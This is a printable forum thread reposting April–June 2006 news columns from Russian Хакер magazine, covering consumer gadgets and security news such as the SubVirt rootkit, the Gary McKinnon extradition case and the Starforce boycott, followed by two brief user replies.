Версия для печати темы

Нажмите сюда для просмотра этой темы в обычном формате

Alf-Studio _ Безопасность и взлом _ Журнал Хакер

Автор: Metallica Nov 16 2006, 09:58

Новости






Мультимедиа-сервер в кармане

Размеры мультимедийных устройств постоянно уменьшаются, поэтому сегодня в кармане можно носить просто нереальные вещи. Например, для того, чтобы хранить фотки, видео и музыку, которые можно проиграть/просмотреть на различных устройствах воспроизведения, достаточно подключиться к ним. Это устройство TViX mini от компании DVICO. Плеер этот имеет одну очень важную особенность: у него нет дисплея, то есть на нем одном проиграть ничего нельзя, зато он обладает огромным количеством аудио- и видеовыходов, с помощью которых его можно подключать практически к любой технике, где и будет осуществлено проигрывание мультимедийного контента. Его может быть очень много, так как для хранения отведен 120 Гб жесткий диск, а воспроизводить можно форматы JPEG, MP3, WMA, MPEG-1, MPEG-2 и MPEG-4 (DivX, XVID), AVI и VOB. Стоит отметить наличие функции OTG, то есть копирование на устройство можно осуществлять с других девайсов, без посредничества ПК. С ним, кстати, связь осуществляется по шине USB 2.0. Габариты TViX mini составляют 82х127,5х20 мм, а вес — 180 г.

Много дюймов каждому

Выбор больших мониторов растет. Естественно, речь идет не о том, что они толстеют или тяжелеют, а о том, что ЖК-панелей с диагональю 19 дюймов на рынке появляется с каждым днем все больше и больше, выбор увеличивается, а цены понемногу ползут вниз.

Компания BenQ продолжает расширять свою линейку ЖК-мониторов с диагональю 19 дюймов. Сегодняшняя новинка называется FP93V. Технические характеристики монитора таковы: время отклика — 8 мс, яркость - 270 кд/м2, контрастность — 550:1, углы обзора по вертикали и горизонтали — 160 градусов, вес — около 6 кг, габаритные размеры — 483x420x266.6 мм. Для соединения с компьютером имеются порты D-Sub и DVI. Кроме того, с помощью креплений VESA этот монитор можно повесить и на стену, где он также будет очень хорошо смотреться. Чтобы он выделялся на твоем рабочем столе не только размерами, производитель снабдил его стильным дизайном — блестящим белым пластиком и эргономичной формой. Как и большинство мониторов BenQ, данная модель снабжена функцией i-key — после одного нажатия на эту кнопку уже не придется возиться с настройками экрана, так как все будет сделано автоматически.

Стильный и новый от NEXX

Весной всегда хочется чего-то нового, светлого и веселого, какой-то радости. Компания NEXX предлагает тебе сделать подарок (себе или кому-то еще), выпустив новый весьма эффектный плеер NF-969. Зеркальный дисплей, обтекаемая форма кулона, стильный кожаный шнурок и миниатюрные размеры (32x47х17 мм, вес 24 г) делают этот плеер настоящим украшением. Несмотря на свои небольшие габариты, возможностей у него хватает: это воспроизведение аудио- и видеоконтента в форматах MPEG, MP3, WMA и ASF, встроенное FM-радио, функции диктофона и секундомера. Имеется цифровой эквалайзер с 10 режимами. Работает вся система от встроенного аккумулятора и, по заверениям производителя, сможет проработать 12 часов без перерыва. Связь с ПК осуществляется посредством шины USB 2.0, прошивка у плеера обновляемая, а в комплект поставки входит все необходимое. Так что выбор весеннего подарка расширяется!

Фильмы на стене

Если ты думаешь, что проектор — это офисный атрибут, с помощью которого шустрые менеджеры в костюмах демонстрируют руководству графики и диаграммы предполагаемого роста прибыли, то ты сильно ошибаешься. Дома он тоже вполне пригодится, станет, например, частью домашнего кинотеатра. А уж поиграть в крутой шутер, растянув изображение на полстены, — это, поверь, незабываемые ощущения. Если тебе нравится такая идея, то знай, что компания ViewSonic расширяет свой модельный ряд данных устройств. Например, проектор Cine1000 с соотношением сторон 16:9 для широкоэкранного домашнего кинотеатра. Он весит 4 кг, обеспечивает световой поток в 1000 лм, контрастность — 2000:1. Для подключения имеются разъемы DVI-I (HDCP-совместимый), композитный, компонентный (YPbPr) и S-Video. Проекторы PJ458D со световым потоком 2000 лм и PJ766D со световым потоком 2500 лм обеспечивают оптимальный просмотр видео и представление данных, поэтому днем могут использоваться в офисе, а вечером — дома. Они обладают разрешением XGA 1024x768 и контрастностью 2000:1. PJ458D весит 2, 2 кг и PJ766D — 3, 6 кг.

Пишем в цифровом виде

На недавно закончившейся выставке CeBIT 2006 различными компаниями были представлены такие любопытные новинки, как, например, новая цифровая ручка компании Logitech — io 2 Digital Pen, с помощью которой можно мгновенно конвертировать рукописные записи в цифровой формат. Ручка и ее новое программное обеспечение более плотно работает с приложением Microsoft Word и клиентами электронной почты, что позволяет перенести рукописные записи в текстовый процессор нажатием одной кнопки. Кроме того, ручка имеет и режим обучения, благодаря которому (а также связи с индивидуальными словарями пользователя из комплекта приложений Microsoft Office) более четко распознаются сокращения, имена, термины и прочие персонифицированные части лексикона пользователя. Интересной особенностью устройства является поддержка фирменной технологии Logitech ioTags, смысл которой заключается в том, чтобы запускать типовые задачи, не путешествуя по многочисленным меню, а просто нарисовав на экране соответствующий символ. В комплект каждой ручки будет входить записная книжка формата А5.

Запись извне

Несмотря на всевозрастающую популярность flash-накопителей, оптические носители не собираются сдавать позиций. Соответственно, остается высоким и спрос на приводы для чтения и записи дисков. Компания LG представила очередную новинку в этой сфере — внешний универсальный DVD-накопитель GSA-2166D. В список поддерживаемых форматов входят все типы CD, DVD-R/-RW, DVD+R/+RW, DVD-RAM и двухслойные диски: DVD DL+R и –R. Привод поддерживает технологию LightScribe Direct Disk Labeling, которая позволяет создавать изображения на нерабочей стороне носителя, используя только средства оптического накопителя. Правда, эту технологию должны поддерживать сами диски и программа их записи (поставляется в комплекте с устройством). Собран привод в стильном черном корпусе, соединение с ПК происходит посредством шины USB. Установка возможна как в вертикальном, так и в горизонтальном положении.

Слушать качество

Если бы не особая, многократно отмеченная в литературе, синематографе и прочих видах искусства атмосфера кинотеатров, то сегодня в них наверняка сильно прибавилось бы свободных мест, так как современные возможности техники, позволяющие смотреть фильмы дома, очень и очень возросли. Именно к таким устройствам относится новая шестиканальная акустическая система Microlab X27. Ее саттелиты — тонкие и стильные — можно установить на пол или закрепить на стену, причем динамики защищены магнитным экранированием, и можно, не опасаясь помех, ставить их рядом с другими приборами. Состоит каждая колонка из дюймового высокочастотного динамика и расположенных по его бокам трехдюймовых среднечастотных. Сабвуфер же комплекта имеет 8 дюймов диаметра. Показатель RMS у колонок составляет 50 Вт, а у сабвуфера — 100 Вт, а габариты — 205x480x370 мм и 98x1115x290 мм, соответственно. Кроме того, в комплект поставки входит пульт ДУ.

Преемственность камер Canon

Компания Canon поступает абсолютно правильно, продолжая совершенствовать удачные серии своих камер. Все, кого интересует цифровая фотография, наверняка знают устройство EOS 20D. А теперь ему готова замена — EOS 30D. Как и ее предшественница, EOS 30D имеет скорость непрерывной съемки 5 кадров в секунду и датчик с 8,2 млн. пикселей. Новая камера имеет 2,5-дюймовый ЖК-монитор, затвор с увеличенным сроком службы (100,000 срабатываний), функцию точечного замера, а также множество других усовершенствований. Из особенностей камеры можно отметить поддержку технологии PictBridge, наличие видеовыхода, возможность связи с ПК по шине USB 2.0, а также, что наверняка понравится профессионалам, совместимость со всеми объективами Canon EF и EF-S и вспышками Canon Speedlite серии EX. Для хранения снимков (они делаются в формате JPG или RAW) используются карты памяти CompactFlash (type I/II). Вес камеры составляет около 700 грамм, а габариты — 144x105,5x73,5 мм.


Чего не хватает крутым хакерам? Компьютеров - полный дом, денег куры не клюют, соответственно, и девочек - вагон. А не хватает крутым хакерам грамоты за их труды. Причем не какой-нибудь, а государственной, врученной депутатом с крепким рукопожатием. Конечно, сама грамота хакеру нужна как корове седло, но потешить самолюбие – самое то. Так вот, недавно в Государственной Думе прошло именно такое награждения хакеров, с вручением почетной грамотны за дефейс сайта. Это не значит, что ты можешь нести в Думу логи хакнутых тобой Пентагона и ЦРУ, надеясь на медаль. Просто сайт evrey.com, который взломали парни, публиковал разные провокационные статьи на тему «давайте уничтожим православные религиозные символы». И депутаты решили, что борьба с авторами призывов путем взлома вполне оправдана, даже приветствуется. «Как депутат Государственной Думы, член Комитета по безопасности, хочу выразить благодарность Отделу Информации НСД «Славянский Союз» за бдительность и недавнее пресечение размещения в Интернете русофобских и иных, разжигающих межрелигиозную рознь, материалов. Надеюсь, и впредь ваша работа будет не менее продуктивна и идеологически выверена», - произнес речь депутат, вручая грамоту хакерам. Интересно, а что полагается тем, кто взломает персональную страничку Усамы Бен Ладена? Не иначе как звезда героя России


В Microsoft программисты занимаются разными вещами. Одни пишут системы защиты от руткитов, а другие - сами руткиты. Хотя обычный руткит такому монстру, как Microsoft, писать не престижно, поэтому жучок, недавно выпущенный в ее недрах (совместно с учеными из Мичиганского университета), по-настоящему уникален. Руткит SubVirt, попав в систему через известные дыры, берет все запущенные программы под свой контроль. При этом определить такого паразита в системе практически невозможно – антивирусы просто не видят, что весь компьютер стал виртуальной машиной. Конечно, такой чудо-жучок представит большой интерес для фишеров, хакеров и других сетевых авантюристов, поэтому пока детали авторы не раскрывают. Демонстрация возможностей SubVirt будет организована на грядущей конференции IEEE.

[американским геймерам грозят репрессии]

Америка, известная своими тупыми законами, в очередной раз доказала, что она в этом впереди всей планеты. На этот раз дело касается компьютерных игр, которым грозит ограничение в распространении, если Сенат США поддержит новый акт. Сенаторы Хилари Клинтон, Джозеф Либерман и другие считают, что современные игры сплошь и рядом содержат в себе убийства, насилие, сексуальные извращения и каннибализм. А это прямым образом влияет на неокрепшие умы детей, которые поиграют, а потому пойдут и пристрелят какую-нибудь старушку. В общем, американские чиновники твердо решили, что в компьютерные игры играть, как и пиво пить, можно только с совершеннолетнего возраста (который в США начинается с 21 года). А дети должны сидеть дома, уроки учить. Миллионы геймеров во главе с игровыми компаниями придерживаются иного мнения. ESA даже создала в Сети сайт Video Game Voters Network, на котором любой желающий может проголосовать за или против принятия нового закона, поделиться своим мнением или просто высказать тете Клинтон свое «фи». А вообще, сдается мне, за автомат детей скорее заставят схватиться не компьютерные игры, а подобные законы.

[фотография в качестве пароля]

Японцев хлебом не корми, дай чего-нибудь изобрести. Казалось бы, уже давно придумали систему аутентификации через логин и пароль, испытали временем, что еще надо? «А нядя удобьсво!» - уверяют японские ученые из университета Сид-зубки во главе с профессором Масакатсу Нишигаки и демонстрируют систему, при которой аутентификация проводится сопоставлением изображений. Запомнить длинные числа и последовательности рандомных символов для большинства людей - настоящая проблема. А вот узнать свой фейс, пусть даже в размытом виде – это запросто. В начале для каждого юзера создаются две картинки: детализированная и размытая (полученная из нее). При входе в систему будет показано множество изображений, из которых пользователь должен выбрать ключевую. Если же будет допущена ошибка – набор рандомно меняется. Еще один японский профессор, Тесуджи Такада, утверждает, что лучше всего при опознании подойдет фотография юзера, которую тот узнает даже в тщательно загримированном виде. Мистер Нишигаки уже подал заявку на патент, не сомневаясь в успехе своей идеи. Правда, еще придется поработать над поиском идеального баланса между секурностью системы и удобством, но сотрудники Сид-зубки с энтузиазмом взялись за дело. Широкой публике новая система будет представлена на компьютерной конференции в мае этого года.
Экстремальные шредеры

Как там поживает твоя паранойя? Все еще боишься неожиданного стука в дверь? А ты уже решил, что будешь делать в экстренной ситуации с «плохими» дисками и дискетами? Выбрасывать в окно? Пытаться проглотить? Неудачные решения! Специально для фанатов конспирации японские компании, Elecom и Nakabayashi, практически одновременно выпустили компактные модели шредеров, способных превращать в лапшу не только бумажные документы. Так девайс от Elecom готов моментально нарезать на ровные кусочки заодно и CD/DVD болванки (совместимость с Blu-Ray и HD DVD не уточняется). Данный монстр уже поступил в свободную продажу по ориентировочной цене в 17,850 йен (примерно 153 бакса). Устройство от Nakabayashi отличается большей универсальностью – одновременно шредер способен пережевать одну болванку или дискету, кредитку или пять почтовых карточек. Засовывать пальцы не рекомендуется. Цена пока не уточняется. Кстати, если обзаведешься подобным шредером, то не забудь и его подключить к ИБП, ведь ни от батареек, ни от ручной тяги они не работают.

60 футов до инета

Если у тебя дома широкополосный доступ в инет, вспомни, каких усилий тебе стоило его заполучить. Впрочем, скорее всего, это было довольно просто: ты зашел в офис к провайдеру, подписал контракт, выложил некоторую сумму, после чего, неделю-другую спустя, к тебе в гости зашел бородатый мастер, который провел кабель и все настроил. Однако далеко не всем так везет. К примеру, одному жителю Канады, Кевину Лавале, всю жизнь хотелось Интернета с нормальной скоростью, но в его небольшом городке (всего 2000 жителей) единственным вариантом был лишь диалап на 56K. И вот в один прекрасный день в городе появился первый ISP-провайдер, который установил передатчик всего в километре от дома Кевина. Да вот беда, для беспроводного подключения необходима прямая видимость, а всего в тридцати метрах от дома стоит огромная церковь, которая полностью закрывает вид на передатчик. Однако Кевин слишком долго ждал, чтобы так просто сдаваться. Попытки установить антенну у кого-либо из друзей в соседних домах успехом не увенчались, и он, все тщательно измерив, пришел к выводу, что единственный способ поймать сигнал – установить у себя антенну высотой 60 футов (18,3 метра). Стальная вышка, 14,000 фунтов (6,350 кг) цемента, несколько недель строительных работ - и сигнал пойман. Если хочешь попытаться повторить подвиг, то подробную инструкцию по сборке можно прочитать здесь: www.short-media.com/review.php?r=301&p=1.
Железный мул

Для изнеженных американских солдат длительные переходы по пересеченной местности – тяжелейшее испытание. Дополнительные неудобства - 20 килограммов обязательной поклажи (оружие, боеприпасы, питание, медикаменты и т.п.), которые приходится постоянно тащить на себе. Узнав об этой проблеме, американское министерство обороны решило щедро профинансировать разработки автономного робота, способного заменить обычного мула. На разработку подрядилась американская компания Boston Dynamics, которая нынче с гордостью докладывает о результатах работы. Созданный робот по кличке BigDog, как не скоромно заявляют создатели, на данный момент является самым совершенным четвероногим роботом на земле. По размерам он сопоставим с небольшим мулом или огромной собакой (1 метр – в длину, 0,7 – в высоту) и весит 75 кг, при этом на него можно нагрузить свыше 40 кг полезной массы. При разработке особое внимание было уделено мобильности и устойчивости робота – он способен передвигаться со скоростью до 3,3 м/час, подниматься в горку с уклоном до 35 градусов, к тому же ему можно от души отвесить пинка, и он все равно не упадет (и даже не обидится). Изнутри робот до предела напичкан всевозможными сенсорами, гироскопами, датчиками и прочей электроникой, а работает все за счет бензинового двигателя. Сейчас BigDog находится на стадии испытаний в реальных условиях, и если учесть, что в министерстве обороны вполне довольны результатом, то создателям останется лишь поработать над внешним видом (который сейчас ужасен), исправить возможные проблемы - и можно будет выпускать серийную модель. Правда, лично мне не понятно, чем живой-то мул хуже?

Нелегальный секонд хэнд

Многие привыкли считать, что российские законы – самые бредовые во всем мире. Однако и в законодательстве вполне цивилизованных стран присутствует изрядная доля маразма. Например, Япония уже много лет славится тем, что у большинства автовладельцев машины не задерживаются дольше трех лет. Причина этому – закон, принятый под давлением автомобильных гигантов, гласящий, что после трех лет эксплуатации автомобиля необходимо пройти техосмотр, затем до десяти лет проходить его каждые два года, после чего – и вовсе каждый год. А проблема-то в том, что стоимость каждой такой процедуры – несколько килобаксов, поэтому японцам и выгодно регулярно менять машины. Теперь же и производителям электроники захотелось такого же спроса на свою продукцию. Конечно, заинтересованные чиновники не решились вводить обязательного техосмотра теликов и компов, но взамен с первого апреля текущего года вступит другой закон, запрещающий перепродажу б/у электроники! Под эгидой безопасности потребителей чиновники планировали задавить весьма популярные комиссионные магазины. Только вот продавцы тоже не пальцем деланные. Отныне факт обмена электроники на деньги будет называться не продажей, а долгосрочной сдачей напрокат.


Издательский дом ООО "Гейм Лэнд" ЖУРНАЛ ХАКЕР #88, АПРЕЛЬ 2006 г.


Новости

Сергей Никитин

Хакер, номер #088, стр. 088-004-10


--------------------------------------------------------------------------------

Сигнализация на ноут

Тем, кто всегда и всюду таскает с собой ноут, необходимо постоянно быть настороже, как бы кто его не умыкнул. Даже в любимом кафе с Wi-Fi инетом, пока отходишь от столика за очередной чашкой кафе, приходится либо брать ноут с собой, либо, оставляя на столе, не сводить с него глаз. Но теперь найден способ, который покончит с твоими переживаниями о судьбе электронного друга. Японская компания с истинно японским названием Kokuyo анонсировала оригинальную сигнализацию для ноутбуков – FILSAFER PC-CARD. Устройство выполнено в форме стандартной PCMCIA-арты, а для активации сигнализации достаточно всего лишь вставить его в соответствующий слот ноутбука. Теперь, когда воришка попытается утащить ноут, девайс среагирует на движение и сразу же издаст душераздирающий вопль (110 дБ). Правда, есть вероятность, что вор, схватив ноут, перепугается настолько, что выронит его из рук прямо в мягкие объятия кафельного пола.

Вот что значит обратная отдача

Одна из самых древних электронных игр (Pong) определенно переживает свое очередное (никто уже не помнит, какое по счету) рождение. Даже не понятно, как может примитивный двумерный пинг-понг оставаться популярным уже которое десятилетие. Пожалуй, все гениальное и вправду просто. Сейчас в Германии постепенно набирает все большую популярность новая версия игровых автоматов PainStation. Данный автомат для игры в Pong представляет собой массивный стол, в центре которого находится экран, а с двух сторон располагаются кнопки для управления ракетками и специальные площадки для ладоней. Каждый из игроков должен одной рукой нажимать на кнопки, а другую положить на площадку. От обычного Pong-автомата PainStation отличается тем, что проигравший игрок, после того как пропустит мяч, моментально получает от площадки неслабый электрический разряд, а заодно и резкий удар по тыльной стороне ладони от встроенного миниатюрного хлыста. Как утверждают опробовавшие автомат на себе, это добавляет игре ни с чем не сравнимый азарт. Первый автомат PainStation появился на свет еще в 2001 году, и вот теперь вышла новая версия, которая стала еще агрессивнее, динамичнее и, конечно, кровавее. Кстати, автомат не столь безобиден – после продолжительного матча легко заработать как неприятные ожоги от разрядов, так и ощутимые ссадины от хлыста, поэтому до игры допускают только тех, кто согласится взять всю ответственность на себя.

Линукс на Туксе

Истинным фанатам линукса посвящается. Итальянская компания Acme Systems приступила к мелкосерийному производству компьютерных корпусов в форме обожаемого миллионами людей пингвина Тукса. Внешне новинка смотрится просто великолепно - точь-в-точь как на оригинальной картинке. Высота корпуса составляет 17 см, а на ценнике значится всего 30 евро. Тебя, кстати, не смутила высота? Попробуй запихнуть в 17 см хоть одну системную плату с процессором, винчестером, блоком питания и всем прочим. Но ошибки тут нет, просто корпус предназначается исключительно для фирменной системной платы от Acme Systems – Acme Fox, габариты которой составляют всего 6,6 на 7,1 см! На этой крохе разработчики умудрились разместить 32-битный RISC-процессор, работающий на частоте 20 МГц, 4 Мб флеш-памяти и 16 Мб оперативки (все это внутри одного чипа), а также два порта USB 1.1 и один порт Ethernet (10/100 Мбит). Между прочим, такой конфигурации вполне достаточно для запуска той самой операционной системы. Системная плата продается отдельно от корпуса, и за нее придется отдать 100 евро.

Правильный холодильник

Ты никогда не мечтал установить у себя дома настоящую барную стойку? А то, представь, после тяжелого дня приходишь домой, подносишь бокал к специальному крану, поворачиваешь вентиль, и оттуда льется свежее холодное пиво… Но мечты остаются мечтами, а в реальности осуществить задуманное не так просто – пивному автомату нужны особые бочки, да и домочадцы против нового предмета интерьера. Однако возможно найти и компромиссный вариант, и в этом тебе сможет помочь новый холодильник по фамилии HomePub, выпущенный английской компаний Servis совместно с Warsteiner. Основная фишка HomePub – пивной кран, расположенный прямо на дверце. Внутри кран соединяется с отсеком для бочки, находящимся на внутренней стороне дверцы. При этом совместимые бочки полностью стандартны и продаются в каждом втором продуктовом магазине. Что можно сказать, HomePub – гениальное изобретение. С нетерпением ждем поставок в Россию и дружно копим деньги.




Автор: Tier Nov 16 2006, 10:26

ф тему, я се зимой буду брать плеер на хдд, который и пишиет из вне и куеву тучу форматов поддерживает и экранчик приличный.

Автор: Metallica Nov 16 2006, 10:48

Цитата(Tier @ Nov 16 2006, 11:26) *

ф тему, я се зимой буду брать плеер на хдд, который и пишиет из вне и куеву тучу форматов поддерживает и экранчик приличный.

И че наерно и видео и фото читает ?

Автор: Metallica Nov 16 2006, 14:04

Новости



SVEN меняет цвета

Казалось бы, в клавиатурах уже сложно придумать что-то новое: уже менялись цвета и форма устройств, они оснащались дополнительными клавишами и колесиками прокрутки, лишались проводов и так далее. А компания Sven пошла по другому пути: она изменила цвет нанесения кириллических символов на свои клавиатуры. Мелочь? А вот и нет! Ранее использовавшиеся красные и белые символы плохо различаются в темноте и вообще с трудом разбираются на темных клавиатурах, приводя к перенапряжению зрения. Теперь же цвета букв Кирилла и Мефодия таковы: оранжевые на бежевых клавишах и голубые — на черных. Изменения коснулись, в частности, новинки Sven Internet Multimedia 660 – клавиатуры оригинального дизайна, оснащенной USB-хабом, дополнительными клавишами и встроенным картридером, понимающим девять наиболее распространенных форматов карт памяти. В продаже это устройство появится уже в мае.

Окна и яблоки

Не так давно компания Apple объявила о своем решении перевести ПК Macintosh на процессоры производства Intel. Но это не стало концом сближения яблочников и платформы INTEL, ведь недавно общественности была представлена бета-версия продукта Boot Camp, который позволит запускать ОС Windows XP на Маках с процессором от Intel. По заявлению представителя Apple, его компания "не имеет никаких планов по продаже или поддержке Windows, но многие потребители заинтересованы в запуске Windows на новых компьютерах Apple, которые теперь используют процессоры от Intel". Пользователям обещают очень простую и удобную инсталляцию, перезагрузив компьютер после которой станет возможным выбор ОС для загрузки. Бета-версию можно скачать с сайта Apple. Возможно, что скоро различия межу Mac и PC станут еще незаметнее. Вот вам и окна с яблоками.

ASUS и Lamborghini

Как ты думаешь, что скажут тебе друзья, когда ты заявишь им, что прикупил Lamborghini? Думаю, отвисшие челюсти придется довольно долго поднимать с пола. Не стоит делать никаких уточнений, не нужно хвататься ключами или брелоком, ведь речь идет о новом устройстве компании ASUS – мощном и стильном ноутбуке Lamborghini VX1. В его оформлении использованы логотипы Lamborghini, а по мощности и технической оснащенности он напоминает автомобили этой марки. Суди сам: он построен на платформе Intel Centrino Duo (двуядерный процессор Core Duo T2500, чипсет 945PM), имеет гигабайт оперативной памяти DDR2 667, 120-ти гигабайтный винчестер, универсальный оптический DVD-привод, 15-дюймовый экран, видеоплату NVIDIA GeForce 7400, а также модули беспроводной связи Wi-Fi и Bluetooth. К этому стоит добавить фирменную технологию управления питанием ASUS Power4 Gear+, увеличивающую время автономной работы, и два варианта расцветки корпуса – желтый и черный. В продажу этот ноут поступит этой весной по цене около трех тысяч долларов.

Verbatim предлагает мобильный накопитель

Думаю, ты не откажешься иметь при себе переносной девайс, размером с визитку, на котором можно разместить несколько гигабайт информации. Это уже не флешка, а кое-что покруче. Такое устройство сегодня представляет компания Verbatim: мобильный накопитель Store’n’Go USB HD Drive. Объем памяти, в зависимости от модели, составляет 4 или 8 Гб, информация хранится на жестком диске, который и является основой системы. Возможно, для кого-то 8 Гб уже не так много, но тут стоит сказать о размерах устройства: 7x5.4x0.95 см при весе 50 г! Это главный плюс продукта, который наверняка оценят люди, нуждающиеся в емком, компактном, а главное, мобильном носителе информации. В комплект поставки входит утилита Mobile Launchpad, дающая возможность защитить файлы паролем, получить удаленный доступ к устройству и, вообще, расширить удобство и функциональность его работы. Интерфейс с компьютером – USB, кроме того, поддерживаются все популярные ОС.


Рамка для фото – теперь все в цифре

Наверняка ты знаком с традицией дарить на праздники фотоальбомы или рамки для фотографий – либо дарили тебе, либо когда-нибудь дарил их сам. Вроде бы банальщина, но устройство Philips Digital Photo Frame позволит возродить эту милую традицию. Это цифровая фоторамка с богатыми возможностями. Она имеет 7-дюймовый дисплей, на котором могут отображаться фотографии, загруженные со встроенного картридера (понимает 5 форматов) или через порт USB с совместимого устройства. Есть несколько режимов просмотра: отдельные фото, мозаика, слайдшоу. Питание осуществляется через адаптер или от встроенного аккумулятора. Дисплей имеет разрешение 720х480 пикселей, органы управления представлены 6-ти кнопками. Приятно, что имеется русскоязычное меню, а экран поддерживает портретный режим. Можно выбрать между устройством в прозрачном корпусе или стилизованном под дерево – так что выбор есть для любого интерьера. Габариты рамки составляют 212х164х105 мм при весе 0,73 кг. Устройство можно найти в продаже по цене менее 250 долларов.

Долой провода!

Все больше и больше устройств сегодня отбрасывают провода, как ящерица ненужный хвост: информация передается по воздуху, что гораздо удобнее, чем лианы соединительных кабелей. Сегодня в стане беспроводных устройств пополнение – наушники Logitech, которые, избавившись от лишнего, ничуть от этого не страдают: радиус их действия составляет 50 метров, что дает тебе возможность слушать музыку, расхаживая по дому. Технически система представляет собой небольшой передатчик с USB-интерфейсом, подключаемый к ПК, а также приемник, встроенный в наушники. Они настраиваются друг на друга еще при изготовлении, так что после включения никакой дополнительной настройки не потребуется. Чтобы избежать возможных помех и наводок от других устройств, предусмотрена возможность изменения частоты работы. С помощью ПО из комплекта поставки и встроенного устройства управления, которое расположено на правом наушнике, можно регулировать громкость звука, переключать треки и так далее. Поддерживается большинство современных мультимедийных плееров.

Титановая память

О том, как важна для ПК быстрая и надежная оперативная память, сказано уже столько, что повторяться просто не имеет никакого смысла. Помнят об этом и производители, которые предлагают подобные модули. Один из них — компания OCZ Technology. Она представила свою новинку – серию OCZ PC-3200 EL Titanium DDR, которая отличается повышенной надежностью. Последняя достигается благодаря высоким требованиям к качеству продукции (вплоть до ручного тестирования). Также на надежность работы влияет фирменный теплорассеиватель, который подвергся доработке и стал более эффективным. Как понятно из названия, память соответствует стандарту PC-3200 (DDR 400). Она имеет 2,8 В напряжение питания и тайминги CL 2-3-2-5. Приобрести данный продукт можно как отдельными гигабайтными модулями, так и набором для Channel Kit (две планки по гигабайту). Подчеркивая надежность изделия, компания предоставляет на него пожизненную гарантию.


NVIDIA делает зачин для Socket AM2

Несмотря на то, что и новое процессорное гнездо от AMD и соответствующие ему процессоры пока существуют только в анонсах компании и, возможно, в ее засекреченных лабораториях, остальные игроки рынка уже активно выпускают для них комплектующие. Сегодня с несколькими такими решениями выступила компания NVIDIA. Устройств в линейке MCP61 пока заявлено три: MCP61Р, MCP61S и MCP61V. Первая модель будет самой мощной, c одним слотом PCI-E x16 и двумя x1, также будут поддерживаться RAID-контроллер для дисков SATA и гигабитный сетевой адаптер. Две другие модели попроще — у них отнимут RAID, а максимальная скорость сетевой платы будет равняться 100 Мбит. Кроме того, на MCP61S будет ставиться слот PCI-Express x8, а у MCP61V вообще не останется этой технологии. Зато у всех троих заявлена поддержка будущей ОС Windows Vista. Выход чипсетов на рынок ожидается к осени, а, как понятно из их возможностей, предназначены они для построения недорогих систем.

][news_Jun2k6

[60 лет за взлом]

В Великобритании продолжается заварушка вокруг судебного процесса над Гэри МакКинноном, который несколько месяцев назад взломал компьютерные сети НАСА и Министерства Обороны США. Если помнишь, этот чувак потом признавался журналистам, что нашел на правительственных компьютерах улики, подтверждающие существование НЛО, чем изрядно потрепал нервы высшим американским чинам. Теперь эти чины решили вернуть Гэри должок и требуют у британских властей передачи им «компьютерного террориста». Если это произойдет, хакера будут судить по антитеррористическим законам, а это 60 лет тюрьмы, причем в местах не самых благоприятных. Адвокаты МакКиннона, конечно, делают все возможное, чтобы этому помешать. В прошлом месяце обвинение представило документ из посольства США, где обещается, что дело Гэри не передадут в военный суд, а будет рассматриваться как обычное компьютерное преступление. Но документ оказался неподписанным и не убедил сторону защиты. Пока юристы решают, где будут судить хакера, виновник событий охотно общается с прессой, заверяя, что хакнул НАСА любопытства ради и никакого вреда не наносил.

[военная утечка]

Как ни охраняют конфиденциальную инфу правительства разных стран, все равно ее часть становится достоянием народа. Особенно много утечек произошло за прошедшие два месяца. Например, в середине апреля с базы ВВС США, расположенной на крупнейшем японском острове Хонсю, в Интернет уплыли данные о пропусках всех сотрудников. Любой желающий мог подделать документ и попасть внутрь объекта, где стоят истребители F-16. Виновником утечки стал вирус, заразивший одну из программ на компьютерах базы, в результате чего произошел сбой. Также несколько утечек важной информации произошло у Японцев. Из-за вируса в инет просочились сведения о времени проведения военных учений и списки военного состава разных военных сил страны. А недавно стало известно, что с ноутбука одного из командиров эсминца «Асаюки» были похищены сведения о боевых заданиях судна и вся зашифрованная переписка. Больше всего японское правительство встревожено попаданием в чужие руки данных о морском рельефе, особенностях течений и глубинах вод вокруг Японии.



[бойкот Старфорсу]

Как ты, наверное, знаешь, одной из самых навороченных защит от копирования является Starforce, выпущенная одноименной русской фирмой. Прошло немало времени перед тем, как ее взломали. Механизм работы защиты достаточно сложный: драйвер Старфорса после инсталляции получает максимальный уровень доступа к ресурсам компа, находясь в системе постоянно, независимо от того, запущена ли игра. Обнаружив подозрительную активность, напоминающую копирование игры, драйвер без всяких вопросов сразу перезагружает машину. Эта особенность Starforce вызвала много дискуссий на игровых форумах и в итоге привела к судебному иску против издательской компании Ubisoft, активно использующей защиту в своих последних продуктах. Инициатором 5-миллионного группового иска стал Крис Спенс, ярый борец с «защитами, ставящими под угрозу безопасность системы». По его мнению, Старфорс, в этом плане, самая опасная. Помимо этого, в Сети появился сайт, где призывается бойкотировать игры, защищенные Старфорсом, содержится вся информация об используемых методах защиты и объясняется, как злой драйвер может повредить юзеру.

[порношантаж]

В китайском городе Янгжу полиция арестовала хакера, решившего подзаработать шантажом мирных супругов. Когда мужу пришлось уехать в командировку в Пекин, семейная пара решила воспользоваться благами цивилизации и организовать видеоконференцию, в процессе которой демонстрировали друг другу свои обнаженные прелести. Они и не подозревали, что их киберутехами любуется хакер, который вскоре вышел на связь и потребовал кругленькую сумму. Платить супруги не стали, а вместо этого обратились в полицию. Хакера арестовали через несколько дней. На допросе парень признался, что на самом деле он не ахти какой компьютерный спец, а программой для проникновения на чужие компьютеры с ним поделился друг. На комп мисс Нагасаки он наткнулся совершенно случайно, именно в тот момент, когда она показывала мужу виртуальный топлесс. «Я и не думал, что нарушаю какие-то законы. А денег попросил ради прикола», - с горестью добавил взломщик. Китайская полиция прикол не оценила, и теперь хакера ждет если не расстрел, то долгий срок точно.


[вредный патч от Microsoft]

Принято считать, что патч - это программа, направленная на устранение определенных багов в системе. Похоже, что у Microsoft это определение несколько другое. В середине апреля компания выпустила заплатку, закрывающую критическую уязвимость в винде, с помощью которой можно было выполнить на компьютере произвольный код. Но вскоре после его установки тысячи юзеров столкнулись с новыми проблемами. У кого-то отказывался работать принтер, у кого-то не определялся цифровой фотик, у некоторых комп вообще стал перезагружаться безо всяких на то причин. Оказалось, что вся проблема - в файле Verclsid.exe, находящемся в составе патча и конфликтующим с разными устройствами. Сайт техподдержки Microsoft был просто завален жалобами, и пока компания пыталась решить эту проблему, на компьютерных форумах стали появляться «любительские» решения: от переименования verclsid перед установкой до отключения процессов в диспетчере задач. Microsoft попытались успокоить всех, типа «sorry, shit happens», и напомнили, что несмотря на возможную сырость патчей, вырубать автообновление системы для здоровья компьютера не рекомендуется. Думаю, к моменту выхода журнала патч будет уже пофиксен.

[всероссийское интернет-голосование]

